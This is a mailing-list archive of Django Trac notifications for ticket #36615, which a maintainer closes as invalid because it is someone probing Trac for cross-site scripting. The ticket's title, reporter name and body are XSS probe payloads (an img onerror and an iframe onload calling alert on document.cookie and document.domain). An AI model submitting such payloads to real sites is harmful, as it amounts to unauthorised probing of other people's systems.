[Django] #36615: "> <img src=x onerror=alert(document.cookie)>
2 views
Skip to first unread message
Django
Sep 17, 2025, 1:18:59 PM (4 days ago) Sep 17
to django-...@googlegroups.com
#36615: "> <img src=x onerror=alert(document.cookie)>
-------------------------------------+-------------------------------------
Reporter: <iframe | Type:
onload=alert(document.domain)> | Uncategorized
Status: new | Component:
| Uncategorized
Version: 5.2 | Severity: Normal
Keywords: | Triage Stage:
| Unreviewed
Has patch: 0 | Needs documentation: 0
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
-------------------------------------+-------------------------------------
"> <img src=x onerror=alert(document.cookie)> "> <img src=x
onerror=alert(document.cookie)> "> <img src=x
onerror=alert(document.cookie)>
--
Ticket URL: <https://code.djangoproject.com/ticket/36615>
Django <https://code.djangoproject.com/>
The Web framework for perfectionists with deadlines.
-------------------------------------+-------------------------------------
Reporter: <iframe | Type:
onload=alert(document.domain)> | Uncategorized
Status: new | Component:
| Uncategorized
Version: 5.2 | Severity: Normal
Keywords: | Triage Stage:
| Unreviewed
Has patch: 0 | Needs documentation: 0
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
-------------------------------------+-------------------------------------
"> <img src=x onerror=alert(document.cookie)> "> <img src=x
onerror=alert(document.cookie)> "> <img src=x
onerror=alert(document.cookie)>
--
Ticket URL: <https://code.djangoproject.com/ticket/36615>
Django <https://code.djangoproject.com/>
The Web framework for perfectionists with deadlines.
Django
Sep 17, 2025, 1:52:00 PM (4 days ago) Sep 17
to django-...@googlegroups.com
#36615: "> <img src=x onerror=alert(document.cookie)>
-------------------------------------+-------------------------------------
Reporter: <iframe | Owner: (none)
-------------------------------------+-------------------------------------
onload=alert(document.domain)> |
Type: Uncategorized | Status: closed
Component: Uncategorized | Version: 5.2
Severity: Normal | Resolution: invalid
Keywords: | Triage Stage:
| Unreviewed
Has patch: 0 | Needs documentation: 0
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
-------------------------------------+-------------------------------------
Changes (by jdsleppy):
| Unreviewed
Has patch: 0 | Needs documentation: 0
Needs tests: 0 | Patch needs improvement: 0
Easy pickings: 0 | UI/UX: 0
-------------------------------------+-------------------------------------
* resolution: => invalid
* status: new => closed
Comment:
This is someone probing Trac for XSS vulnerabilities, not a true issue.
--
Ticket URL: <https://code.djangoproject.com/ticket/36615#comment:1>
Reply all
Reply to author
Forward
0 new messages